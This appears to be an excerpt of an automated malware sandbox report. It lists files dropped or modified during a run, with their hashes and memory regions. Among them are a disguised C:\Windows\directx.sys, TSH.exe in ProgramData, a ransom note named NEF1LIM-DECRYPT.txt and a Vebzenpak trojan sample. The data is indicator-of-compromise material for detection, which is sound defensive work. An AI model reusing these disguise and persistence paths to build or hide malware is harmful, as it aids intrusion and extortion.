| SHA512 | 74403023b73c742b42ba8b875027b3e02857d7c8f46076525c54eafe872635ead90f53f6d7ef23b0ba521775a1643f9221641fda02f34178370ff5c9f908c3a0 |
memory/2592-3028-0x00007FFB70800000-0x00007FFB70834000-memory.dmp
memory/2592-3027-0x00007FF6A5510000-0x00007FF6A5608000-memory.dmp
memory/2592-3029-0x00007FFB60D90000-0x00007FFB61046000-memory.dmp
memory/2592-3030-0x00007FFB5DEC0000-0x00007FFB5EF70000-memory.dmp
memory/3160-3031-0x0000000000400000-0x000000000041B000-memory.dmp
memory/664-3032-0x0000000000400000-0x000000000041B000-memory.dmp
memory/2084-3033-0x0000000000400000-0x000000000041B000-memory.dmp
memory/3560-3034-0x0000000000400000-0x000000000041B000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\300d3ba8-9fd1-4a35-ad86-1aba741d2230.tmp
| MD5 | 901060b70cde76414e6faf7753de4031 |
| SHA1 | 5c05ebf3dab261415d9d3bfa7aa52c59922f96f3 |
| SHA256 | adb5207b6dad19edc483ac965d631077c81af799946b527831e21c315de9c720 |
| SHA512 | 6310e76531bed2e89813b86a53d52a889818126e0f3ce23c1921a934ab9d51511743df53823bbbf9642b36c3c843a6df351c7fa7bf88caf3c4b379e0db07cdde |
memory/3160-3046-0x0000000000400000-0x000000000041B000-memory.dmp
memory/664-3047-0x0000000000400000-0x000000000041B000-memory.dmp
C:\Windows\directx.sys
| MD5 | 659a3e3bd68e465d6c1298bcdfc4ff6b |
| SHA1 | 66a6f41f6530c4024acb000229c14fa0755eef52 |
| SHA256 | 8f669c94b99ddd078d0628bc47ed7e62ec9227617a34643dae2b46cc8cf81bc7 |
| SHA512 | 12b101361cbe96bbd9dad9ab9b146be1255f4d8da79e89428b5402c8042fb817ffa7e03370cc567d32136b1deed341d017a0724304d8d1a2a73c0c5efc5e127d |
memory/3160-3055-0x0000000000400000-0x000000000041B000-memory.dmp
memory/664-3056-0x0000000000400000-0x000000000041B000-memory.dmp
memory/2084-3059-0x0000000000400000-0x000000000041B000-memory.dmp
memory/3560-3060-0x0000000000400000-0x000000000041B000-memory.dmp
memory/3692-3062-0x0000000000400000-0x000000000083D000-memory.dmp
memory/3892-3061-0x0000000000400000-0x000000000041B000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 843201cde73e09d21ce92415c87644e7 |
| SHA1 | a1cc0cc99d0487be97c524ad5fcd82466b41d3b5 |
| SHA256 | dc72d9118e2362aeb127c533e38183bc1ffbfc778e4863f4a9cd5bb6f0a4baa4 |
| SHA512 | 99b1f22cb18f4a842b9accdd4d2eb00e138f3f4c87c10b3b56605af2c1c59ea4389650dc93d97262f2d29660523b7fdf8e60cfe4f971c55bf4f8aeac9b5f0a32 |
memory/3160-3074-0x0000000000400000-0x000000000041B000-memory.dmp
memory/3892-3076-0x0000000000400000-0x000000000041B000-memory.dmp
memory/664-3077-0x0000000000400000-0x000000000041B000-memory.dmp
memory/3160-3078-0x0000000000400000-0x000000000041B000-memory.dmp
C:\Windows\directx.sys
| MD5 | adb221a2cf618daac4c46bd0d5d4ae0c |
| SHA1 | a329c34de11d5a0cf420d4590488c31bf698dab0 |
| SHA256 | baa4dd591a99137254e74ad08916ee2c0f404839f01752d8e6106602dac7c90e |
| SHA512 | e7125dc7aa1d3eda86be2b3a861ab06e873e636321d9a17b84860d45b37c69772a39066b83b064bb87d8f5fa15d81ac3d750f0eab9fa1016d8538be836c9bbf8 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 8c26526f8f39e8a1fca0e2724e9716ed |
| SHA1 | 1a779eb69c1f97c8b934d2a834ad5d4bf2decb81 |
| SHA256 | 987434bf1c758221eea2cbff7dbe15e43c9242ced92f7e95813181ece218da2c |
| SHA512 | 3ec4d2732268dccc2686c40bc32c4d83ef383f56ab5c5dfea6c17ecdad3dff8846f713fb3ca6634beb3599ccc9a5d1078f646175a1393ad8c95f17c6de69d2e8 |
memory/664-3097-0x0000000000400000-0x000000000041B000-memory.dmp
memory/4304-3101-0x0000000000400000-0x000000000041B000-memory.dmp
C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock
| MD5 | f49655f856acb8884cc0ace29216f511 |
| SHA1 | cb0f1f87ec0455ec349aaa950c600475ac7b7b6b |
| SHA256 | 7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba |
| SHA512 | 599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8 |
C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx
| MD5 | b5ad5caaaee00cb8cf445427975ae66c |
| SHA1 | dcde6527290a326e048f9c3a85280d3fa71e1e22 |
| SHA256 | b6409b9d55ce242ff022f7a2d86ae8eff873daabf3a0506031712b8baa6197b8 |
| SHA512 | 92f7fbbcbbea769b1af6dd7e75577be3eb8bb4a4a6f8a9288d6da4014e1ea309ee649a7b089be09ba27866e175ab6f6a912413256d7e13eaf60f6f30e492ce7f |
C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val
| MD5 | d222b77a61527f2c177b0869e7babc24 |
| SHA1 | 3f23acb984307a4aeba41ebbb70439c97ad1f268 |
| SHA256 | 80dc3ffa698e4ff2e916f97983b5eae79470203e91cb684c5ccd4ff1a465d747 |
| SHA512 | d17d836ea77aeaff4cd01f9c7523345167a4a6bc62528aac74acde12679f48079d75d159e9cea2e614da50e83c2dcd92c374c899ea6c4fe8e5513d9bf06c01ff |
memory/4304-3115-0x0000000000400000-0x000000000041B000-memory.dmp
memory/3160-3116-0x0000000000400000-0x000000000041B000-memory.dmp
memory/664-3118-0x0000000000400000-0x000000000041B000-memory.dmp
memory/3160-3119-0x0000000000400000-0x000000000041B000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | e723b40a0509234884e89c352c4a79b7 |
| SHA1 | a1fe1fc864313eb118b97368be75f4973bf2f14f |
| SHA256 | d3695748070c33f84921133d4314f7d5c1b73ae30105f75bac9b559d93416ef0 |
| SHA512 | cf3e32399a11dde231e69af1bea4bd1342ff12b90de9af5f7fba59b7b47f343380e011aba9e13ea0cdf387eb3055dbd40bf3c6cd9cdb2d4b15a403f68171f8ea |
memory/980-3138-0x0000000000400000-0x000000000041B000-memory.dmp
C:\ProgramData\QQOFCC\TSH.exe
| MD5 | d60cf802e4316bfaf8ca1964b2f1c769 |
| SHA1 | e7ed7367a4f107002a1e3b4b7786a7dc3d6c78c6 |
| SHA256 | 26f91ae0fb21c5966c18bf6eb3c0f7e0358c46d54c97c580ed41b03b5f8443b3 |
| SHA512 | 82ba16d17d01c85c6ac51338a6a10881832eb40636400eb5191d44365f83e5bac2b408748008c37760bdf8367d6a9ae7cb75f08bad44e1e8a4ed8b625dffcfae |
C:\Windows\directx.sys
| MD5 | 80b834412fd107d3b575f9b3e66ca1f2 |
| SHA1 | e2464128d56d4b9b3c68ecaa36483534a601b68a |
| SHA256 | e8e6d94a8971fa22fedbdf31f3601059e9220556ee39e0503508da969c5000b3 |
| SHA512 | 680fed241ca5af5fdca09ca947d0bdefa6cfa7b54bcbbeeb1aad208ba568bf8efff226f566638d842e2b2a01a1bae4439b7306a104a76e0baa8c4b4ba12205a9 |
memory/1120-3150-0x0000000000400000-0x000000000041B000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | be7e7aa5130614d4f1ff581baf01d66e |
| SHA1 | 75576262a88e2e8ac6404ea27e9dd84bb1a5267d |
| SHA256 | e5eb3c371046f4be2f598c9f7d8253d254c686cbe610b9016b12b23627c9bcc5 |
| SHA512 | 836d432bfb9a05c72231e9dceec47b8a2a746ff79b12dc6426fe6395c81580f319e0f86668eba4d2ae21f4ad3f85547a65f848fe2abc6f66e62a76c354285bd9 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 546d0f46d4f8fe200667b9da637820ec |
| SHA1 | 68642b540f621ce8859fdeb710dad00e4ee40790 |
| SHA256 | 42091670e86234565a250cbd28e17a4a6f86fec2a0ca99ede392babf731abaf9 |
| SHA512 | 60badb2606075a2b1f5261b4b3d6740d54edba0d3cbfa09da2ca941de5477753ecac3173c8522082633dc578d14ae79ba4c2d8ebaa2b47090d460fcf8ff133a7 |
C:\Windows\directx.sys
| MD5 | a6d2895e6295c22e30a941cfa2a8b740 |
| SHA1 | 9b2336696c81a4dad5e664f10fe35f9c4bf8f95b |
| SHA256 | f8413c8a3843371ee75e422bb635041a9f89517116d3113d6a17733506ce95c9 |
| SHA512 | a219fa66e3ee92df29269fd4820c909bc91e68247bdc80cfca0173b8dfd0761bbcc82a26461268f7602f2df0e9d6a5341ce574641f031fac41b7739aaf5520b4 |
C:\Users\NEF1LIM-DECRYPT.txt
| MD5 | 26024bfff1079296a378717d3d1cb7b0 |
| SHA1 | 26dd37b88849066fb84c3a46401fd754972f9e2f |
| SHA256 | b777912f6a8177b2c58cb448da68c0eb6b2d6ab30dcc3ea0ca7e5895f40d7887 |
| SHA512 | 69ca9d20b9322f772caf9698f2bd42cd1451369c2692042e9003a4c57b60708d385e59f6e17fe11f33b52eba48f1f96b3b84f9458c9df27b9707c76981432f84 |
memory/4120-3604-0x0000000000400000-0x000000000041B000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | db263671c858de731f33008421b40097 |
| SHA1 | b2e62b003dff9bff1b723e7e16a570100038e61f |
| SHA256 | 6053223c6394ea957deb14d5f62aef29403cb50dd8b3471726d425a4b836914b |
| SHA512 | f934ded409a0e6d0cac649be817314f62d3313e3448af589f81ea2ba336e60896850e65034f70f68c40f03f29aef621f5cf875d19bb2955595b2ff2ddd4f8e31 |
C:\Users\Admin\AppData\Local\Temp\scoped_dir3012_1420145593\d31b67e9-b462-46b3-8a1d-16de8ee1a6f0.tmp
| MD5 | da75bb05d10acc967eecaac040d3d733 |
| SHA1 | 95c08e067df713af8992db113f7e9aec84f17181 |
| SHA256 | 33ae9b8f06dc777bb1a65a6ba6c3f2a01b25cd1afc291426b46d1df27ea6e7e2 |
| SHA512 | 56533de53872f023809a20d1ea8532cdc2260d40b05c5a7012c8e61576ff092f006a197f759c92c6b8c429eeec4bb542073b491ddcfd5b22cd4ecbe1a8a7c6ef |
C:\Users\Admin\AppData\Local\Temp\scoped_dir3012_1420145593\CRX_INSTALL\_locales\en_CA\messages.json
| MD5 | 558659936250e03cc14b60ebf648aa09 |
| SHA1 | 32f1ce0361bbfdff11e2ffd53d3ae88a8b81a825 |
| SHA256 | 2445cad863be47bb1c15b57a4960b7b0d01864e63cdfde6395f3b2689dc1444b |
| SHA512 | 1632f5a3cd71887774bf3cb8a4d8b787ea6278271657b0f1d113dbe1a7fd42c4daa717cc449f157ce8972037572b882dc946a7dc2c0e549d71982dcdee89f727 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.83.1_0\dasherSettingSchema.json
| MD5 | 4ec1df2da46182103d2ffc3b92d20ca5 |
| SHA1 | fb9d1ba3710cf31a87165317c6edc110e98994ce |
| SHA256 | 6c69ce0fe6fab14f1990a320d704fee362c175c00eb6c9224aa6f41108918ca6 |
| SHA512 | 939d81e6a82b10ff73a35c931052d8d53d42d915e526665079eeb4820df4d70f1c6aebab70b59519a0014a48514833fefd687d5a3ed1b06482223a168292105d |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.83.1_0\_locales\en_CA\messages.json
| MD5 | 07ffbe5f24ca348723ff8c6c488abfb8 |
| SHA1 | 6dc2851e39b2ee38f88cf5c35a90171dbea5b690 |
| SHA256 | 6895648577286002f1dc9c3366f558484eb7020d52bbf64a296406e61d09599c |
| SHA512 | 7ed2c8db851a84f614d5daf1d5fe633bd70301fd7ff8a6723430f05f642ceb3b1ad0a40de65b224661c782ffcec69d996ebe3e5bb6b2f478181e9a07d8cd41f6 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState
| MD5 | 6b26981938ca86b4fa3e83148bfbd800 |
| SHA1 | 8a4c503a2be9b4589174a842e325d6623967a79c |
| SHA256 | f7fe336dca5af65094db2b8275ad85a58626a6a7c205d542f5429137601dc25d |
| SHA512 | fb7a47d8ab2b2c20be784fc24a19fd0cf155e70554d2c3626368d205eee00bfa02fabf1c500275e87c02629fa8ac2ff4bfaa247f5b13d500a7fa4af19a489db4 |
C:\Windows\directx.sys
| MD5 | 590a8a29b5d92d68914ddaa8407b7a1f |
| SHA1 | 08a4a5f9206f7b29e901f187bd97b7cc8254dfa0 |
| SHA256 | aa0f54b983b7ce13f85c4e3b11c3445f64065b4e36cb0887c9f7cc5fb261c00f |
| SHA512 | 2334ae78ed3e19beff1ebf2bad22cfc712736c1f94617e20fb2f508a6b8a8a6f07e32dbedfa2508dff604db7f42f28bc0d5f91631bb70c34abbb2c09be1f377e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 2b4ee51c9e556528de41967dc1172d79 |
| SHA1 | db923b921595ee4161823044fb25a6149ce555bf |
| SHA256 | 92db1d85c791c7bf933ce6b75ca41c89dcb70d47de882414a592c07341c00f2f |
| SHA512 | 0514523be26e189feac866697f9d9f7003190c44561394950e9b5eb474961ae20774c26f952117b4e56265adddc128eb50ee39fbd4bde7fe3c455369fa0e15e2 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 4a791622fc8cad9cf4ff72c1fb192f2c |
| SHA1 | e0a1b44684cc54ae2fb26750ebe82cb7302dbdaa |
| SHA256 | f7f0181261f41fc57a5c9cccc46993ef03fad4b5aa2fa4fb25df2fe2665e4ee2 |
| SHA512 | 77d7153968d0567b482e0400ff3a4a7d6cb652a60e138e119b0f4748dfcd5a2fe6e011ab87746b632968e27994a751af3c775510da418ddaf00f29e6117940e2 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
| MD5 | e13802e721eca437ff96d978e23163e7 |
| SHA1 | a173e338282e727b90620e1d50c379d2da7f7f7f |
| SHA256 | d0a2729b1898a05f53653e84e3c2abbd23a3f405bfdb9fb98acebc1cb0c6c19c |
| SHA512 | 18e903dc603657da14021aeb9dfe2361573466f42b1a03d102d49d66bed9ef8ef21ae56e7849dd55616aa2d2568e873ca06ecc473b2044b7aa74b1235b60c3db |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | 3699475f136f7979c2ad718d6f005925 |
| SHA1 | 9abf25f27a9323c1467136f4a50fa54100cd1050 |
| SHA256 | 5b65b17a170d780507204e2de0a07d71a5cc9a39907615e5e8404f77f3f4cd8a |
| SHA512 | 0afd5b8c4e5bdb36c970e0618dffdd9e9f02bc2216b2610b3d05b7430d2b28e348e564cbc07da9e929dce65e3fda9c6e88a7804781b12fad9b2c9051976c190b |
C:\Windows\directx.sys
| MD5 | 9b2646dd4b5af4d7e8dbca0eebb94ff4 |
| SHA1 | 7416a4ceb6a25b92eb197068f8cb4ce7d8cd046e |
| SHA256 | e055db4275b1c1470870e18e74d9f65bedc0dc02585a85262431a273cb1d7c54 |
| SHA512 | 74a0e4fceab1d9eca6f06b0801befff3a7a626d186c1912f67fc2e5b7b92d87a430863d657f2c90026835aba94781884eb2889fb60073fa3a02d8aac49a43f0e |
memory/4276-4082-0x0000000000400000-0x000000000041B000-memory.dmp
memory/4520-4085-0x0000000000400000-0x000000000041B000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
| MD5 | ebd8a3b39a2134a0d7e18b62988d54e0 |
| SHA1 | d4dd83f15ea7a2b6f04646077139ff58d9a90d81 |
| SHA256 | 1c09bea9363b6075c74099d3ed114531858eee638b46bfc5d2131641a6ef8d14 |
| SHA512 | f019f49bb40864a20450b86ea7e0ba44ee0a15bad7bc1a0e25e558c613be11d01eb2a7001f94eaef20767a39dbdf623cbf29602f7ec5f23a32bc1bc368e4a2af |
memory/460-4097-0x0000000000400000-0x00000000005AA000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 9e49cab166d5f9067a8afda464a798a3 |
| SHA1 | 837562d13416a693dedfae1c40940ab86e117728 |
| SHA256 | 67b2cc06999f3eb56179275811bb1e1fdb4478b8dff8f27662d50f38e5989fdd |
| SHA512 | fd8765a833122a92fa1edddd2510e6ad2d6117c5be142d708d83dd1bdb4d741e991227c2e388675a7573cfa7ff7c1a5c209ae199c1f71530c882d0228396a33f |
memory/2012-4107-0x0000000000400000-0x00000000005AA000-memory.dmp
memory/4520-4117-0x0000000000400000-0x000000000041B000-memory.dmp
memory/460-4118-0x0000000000400000-0x00000000005AA000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Mxnpxnryiygd\sbozxh.exe
| MD5 | 113a5b6212166883a9326300bedb71c8 |
| SHA1 | 345fcae734af832a24041f1b61ea0b288f4cedf7 |
| SHA256 | 0c860d517b29953e126f807fec21e933de60da086fcba3987740d166d98ebe42 |
| SHA512 | a3b2fd43cb24cb4ce3908ff1f183cc60644df0f4f0ded5efb2654a803af64e00cbbd55e61fe4230b561031175dbd167c001e554bc1ec2a5624c8aab5869999b7 |
memory/460-4121-0x0000000000400000-0x00000000005AA000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | f2e6b75cd33a5084deba0024ff682e40 |
| SHA1 | 2ed82bc0bed4ddf83b023a5d5bef16c433d4bc8f |
| SHA256 | 9c5e26a441db8b3ab94ff2f67991582efd40c240c01c383960f190e0fac4551f |
| SHA512 | 5189dda5fe35ab6f94102fafb7bd2614650ae2c964cf70606d560227dc3f7999e2748b042a62e9fd536a931e7445790e821e423745da5a3f76e7e9bda21395b4 |
C:\Users\Admin\AppData\Local\Temp\7zE4E8C106C\Trojan.Win32.Vebzenpak.zge-0f4b51a77a14b68958612251f2b78cd52af600a1ba5de9b1a6402865dd93d0e7
| MD5 | 83b9f48fdc1e12b5885a3f848b6648fd |
| SHA1 | 13cb131c7616c85dfdb112ac2c24b39f862803c4 |
| SHA256 | 0f4b51a77a14b68958612251f2b78cd52af600a1ba5de9b1a6402865dd93d0e7 |
| SHA512 | 4c95fd49587e1d7285d2b0a1661b9e42b2f48b71c259b91264324388344d8af1d231e2e5d609700fa09b3262e0dea6b0ea00c9eaba39156e07abd3b6e464679f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 76f2606c3537a377e8d9d69483017dff |
| SHA1 | a49f7e044cbf8828001aee795dbccf5c143df832 |
| SHA256 | 35bf89be2060ac4578f1d116e4095754c1b1280d7f08b6145896e7572f469b41 |
| SHA512 | 1fb66867e653f977d7e03e9f691026145afac41b839edfd569b9e7401585408a500e71e0a0bad4fc0622840b388200240bab9d17aaa57138d9fa8fe046ef9ce7 |
memory/4300-4155-0x0000000000400000-0x00000000005AA000-memory.dmp
C:\Windows\directx.sys
| MD5 | b0d781403529d7fc3ab62b011e376ec0 |
| SHA1 | c30194a2145d189b838fff61b03abbb28ddbbf4d |
| SHA256 | 95afddbad28bde82b25129882e1ebebc5536610fd4fe1ee2b339ec184f42aea4 |
| SHA512 | 107a76be11b35ef374923b43bcfa16a33f5722372f5fce3b53075e826efb2bf714232e41f15d69a8d4150d6094d981f4db72a9ebc15d5e250c28556dbacdd8af |
memory/2076-4163-0x0000000000B20000-0x0000000000C70000-memory.dmp
memory/2076-4164-0x0000000007E30000-0x0000000007ECC000-memory.dmp
memory/2076-4165-0x0000000008580000-0x0000000008B26000-memory.dmp
memory/2076-4166-0x0000000008070000-0x0000000008102000-memory.dmp
memory/2076-4167-0x0000000008000000-0x000000000800A000-memory.dmp
memory/2076-4168-0x0000000008200000-0x0000000008256000-memory.dmp
memory/2076-4169-0x0000000008060000-0x000000000806A000-memory.dmp
memory/2924-4174-0x0000000000400000-0x00000000005AA000-memory.dmp
memory/4408-4175-0x00000000016D0000-0x00000000016FE000-memory.dmp
memory/4300-4176-0x0000000000400000-0x00000000005AA000-memory.dmp
memory/4408-4178-0x00000000016D0000-0x00000000016FE000-memory.dmp
memory/4408-4180-0x00000000016D0000-0x00000000016FE000-memory.dmp
memory/4408-4177-0x00000000016D0000-0x00000000016FE000-memory.dmp
C:\Windows\directx.sys
| MD5 | 508916f9d2ec1bc13aedcbc05eace7ea |
| SHA1 | 52af9195bbc1fd3f68d7aa1ff7748a7444c3cb4e |
| SHA256 | 9d9d74f95fd72f02beb0edb9bbee2b11ffa764028c05f42dc475fa5ec3a5165b |
| SHA512 | 2eea212602f6a08d0e4ceea6a1a45e0b0c57dd847a064e0ab28f0472232d92bf9d86d2065b8c82f2caa9b90e33d8a24c7b191774914e2673df3c93187d8146d6 |
memory/4904-4194-0x0000000000400000-0x000000000041B000-memory.dmp
memory/1432-4195-0x0000000000400000-0x000000000041B000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | b6d5ff3d49bbcca82ef6b0da7a593aab |
| SHA1 | 9c66fdcfa97f1c779bf5133882f9e5ce94af49a5 |
| SHA256 | 1c6f185fb80ecf9de6d80c2824dbc1d657f35c1282fc2bf031cafc51a28191ae |
| SHA512 | eaa32555c85a6d6b4466cc1c26dbd30ec1f427bbee255483167d29433f77e8627e5ffcd3bb6f9a6ca8ed407ff9a7bfd1013f9b571d378e0e85c9deb2d8cf534e |
memory/3100-4221-0x0000000000400000-0x000000000041B000-memory.dmp
C:\Windows\directx.sys
| MD5 | 0f0c2de77bfb773b4b4e1bcc3f3266bb |
| SHA1 | cf07c998cd2e74340dd83c41382bc4eadb2033bf |
| SHA256 | a59d87cb68161f4c0827204f5a9569d84bae51477792b919dc5a18425e72ad61 |
| SHA512 | a585833f67bc63787dcabc7baace0f84f8fe819cc7c2d6231f134fff42eddf690328ccf5ff92fe8595dbcddbc58f6ccc8135d43688eb126fb9d35c83393a68a4 |
memory/2268-4228-0x0000000000400000-0x000000000041B000-memory.dmp
memory/760-4234-0x0000000000400000-0x000000000041B000-memory.dmp
memory/2200-4240-0x0000000000400000-0x000000000041B000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 96b745dc5570966d30ad076427594e7a |
| SHA1 | 9dcd87f0e02d464bde7a6b1200421c1fdc7842f8 |
| SHA256 | 16bf38d564d98844e8719b377c663ba75adc1fdb8c3257fc600b9125c48d9d2d |
| SHA512 | 1771b2b77007bbaa84a3874b119076d7e5e81fbc247d56cb5f71d98835f91e62744aa14c26582eb45e64c9060d6992e48597a9211370c10eaf73ccd513f70f64 |
memory/1432-4254-0x0000000000400000-0x000000000041B000-memory.dmp
memory/3000-4266-0x0000000000400000-0x000000000041B000-memory.dmp
C:\Windows\directx.sys
| MD5 | 77eff2033b746e8acc849afdc5dce6d1 |
| SHA1 | b7b7ffd112b95b7f3ac2f0bb64101a22b98d3050 |
| SHA256 | 5fb7b4d87765d19903bfb7ced4de563a99705dc728b3d05683b9dd16d5caf764 |
| SHA512 | d770663ec1f3cb52a99d0767dda52f84d949d5e3385fbc5d0d0566b1915ec34b425881454181b11ac78bb62020e95ed4f6cdc985eeadd41b66c51ac268cb76e4 |
memory/484-4272-0x0000000000400000-0x000000000041B000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | daa4230e644a559585bcbe1df045db6f |
| SHA1 | 24996232564d765d7b3984fd8df26d35e3a81274 |
| SHA256 | 8a42f15fbc31c8c397f4e0412d2e4b21a9582719ef104036b3f837d92f5b81cd |
| SHA512 | 7c4f9bf99f85fae990908161b27068b69cfd31b8999b6f4a2e1699eabef85f021518ec8781cc62e7aa59bfaeb65f7b88060b2aad1ea248b17812da6d1b5f8d98 |
memory/2076-4303-0x0000000008F70000-0x0000000008FBE000-memory.dmp
memory/2076-4304-0x0000000008DE0000-0x0000000008E14000-memory.dmp
memory/3532-4305-0x0000000000400000-0x000000000042D000-memory.dmp
memory/2792-4308-0x0000000000400000-0x000000000041B000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | d9dedcaa59f2641d927879bb2fed85ba |
| SHA1 | 30153b4087bff23cb52db4fb7bef453d422a35d4 |
| SHA256 | e751c1b32a3c4af71fca94eca46defee049dc384a8998efb074b7cb92715567b |
| SHA512 | 75428a2ad495756818164848b526e2d0abe39a35f6d1d37403877912a6b5747064274e3947311ddfde242f66a29a6fe8826d9b1ca91f19083954375b054d1208 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | c31bb46f42ea8007d3b253ad07a76c18 |
| SHA1 | 3143fa76777c92a3ab7cd85ac51d6f8dd6752039 |
| SHA256 | 02110ab889fe138483141f041b123df27ac9b38ba2a036883af9c4359c1254e4 |
| SHA512 | 47c3338034881a49355caef2b8f7091c6be1dfc7aa43644e835dac74b612cae2f12cfb4b89e9075b102d0fb00e754d8a4ab1a5ddfd3438682ba1d4a404151d72 |
C:\Windows\directx.sys
| MD5 | f7d7c8ed7c6e3368b84fd92559267b58 |
| SHA1 | 2e2fa1a92aee6806915f58dba7b8b9cb58692a68 |
| SHA256 | 22d5a4635de3bb2110a95cf65268abf367be911e7607439dd83eefff8796dea7 |
| SHA512 | 5a383d0064ef1a30879e16e64c9433cfcd62fb4c3450e2a212aea05fc6cc38a0239b41494ede306500815267c75c9a9384f0ca2903c7583d169288da10fb8870 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 02119ad338acb5028296d5eb029d35bb |
| SHA1 | f1df836c35127d2f0b5b75882be7d37b41c91f03 |
| SHA256 | 9426a75c6e2c1f54e25f80ab4a872c00bfbb7a2691685e611a26e1110e85bc25 |
| SHA512 | 120b3bc15410091fee56b0d40eaaaab0a50b899dc68bf6231ca6b22dd4423f777e81e93d6b0942d0034fe6cb604284839762f149185a72d6ae2ef525324dac0d |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 68fb39f6b34f4cc70baef29e181ad800 |
| SHA1 | 0170c22821e6cd8eb33a6d0c8902bea4b52a9402 |
| SHA256 | fdd9f5895ebd572d9e259536c01b18269d6207f4ec7e2a8dc74cdc4d3efa2f7b |
| SHA512 | ce9c44ad18e080f624bbf1b72bfe64d76abb0c0b8621bbaa7d7fdcd4d1d518c05e1e3080aa40da4b899acb8a091a1dbd54c1ac8fffdbd2cb8c9c46ff81bd2d39 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 1c2d012ee0b8c3d0b5c1e8576a9569f3 |
| SHA1 | e464889a7caeab2f9c1b8bf59b5f42785e3eb257 |
| SHA256 | dcb1a7582647b80590e4cc55d99986cbba4776d64a79717aba760a41eeb05797 |
| SHA512 | a863c0180f97cbf8da3522f6b5bc81382393088331d115d865dee65a92dcbfe7f17222b275e3804aac3b5f110fa931f651bbb75cced6b1cda1f8a4b7f905fd62 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 86d861d4cf2c2693a49fe9de5417dfa5 |
| SHA1 | 9b188494fad691f6b6449d25403d6442ed1f59a1 |
| SHA256 | e305f8031bb401d5fb1c97f865a08e2b85a8c60c9f002eba2066c192f9e39d25 |
| SHA512 | 13e8ab7353038574552f7694dab3fc741d5cb9de0987de61138cfccdb1efed936af9fb748bb248fd6663aa5d6df1de9a95bde109f6fd917ab0482871fc09cf23 |
C:\ProgramData\KMQ\TSH.001
| MD5 | e7477aa3d8a2370353589d2ecba6f24a |
| SHA1 | 466511105241b0ed7b36d3ca573d76e14d2ca6d9 |
| SHA256 | f51a79e59ef7b7f398b314882ed6bc07449076dbeaeb2930603db0e11879e989 |
| SHA512 | 1d28baf8092f641d79ef673ed00213495abd5b93a9296e680139fb9595aea568f0be9e789fcb9133fc9e9c6184020c2aa1c66bf2ac9d6d6be265ff6adf9cc451 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 8f0cd165a26a873f9d3faa05d2d96a73 |
| SHA1 | 984897c9b0a41e245eff719f0704d8dbe8076fc2 |
| SHA256 | c1d15ebe1047eaea732b6531f8c0aebac35c1a1643f6a1e39b3971cbb18d8683 |
| SHA512 | f9e057aa02453915365765ff4acba5bdd863e7b4a4f12e6e985d53e8c2041d665b933540594eee08d548f45f16a80f072488c37bb18ba9a37c9be922f4977a3e |
C:\Windows\directx.sys
| MD5 | 9013e148365eb10e5f1fa4a7f8c6aebc |
| SHA1 | 77af3c0b09994d991fb5c92635287b9a61af5f08 |
| SHA256 | 6b4a08517dbbdd20182f37714ab4524f860a6bdec35918553cd1684967dafd74 |
| SHA512 | ebf2c33fcc97294a014027eb56be652d1bc8a45f6730b582130ae1c88b03b4b9d938d52f52ee03f421506c8a31e3dc98a456610507d1b1724104aab7eed955a0 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms
| MD5 | 0f77fb1cc2720246fc5b65ab29b494e9 |
| SHA1 | 93a42f2b8f6c6e36cbe7d3bb266b29aa2ad37035 |
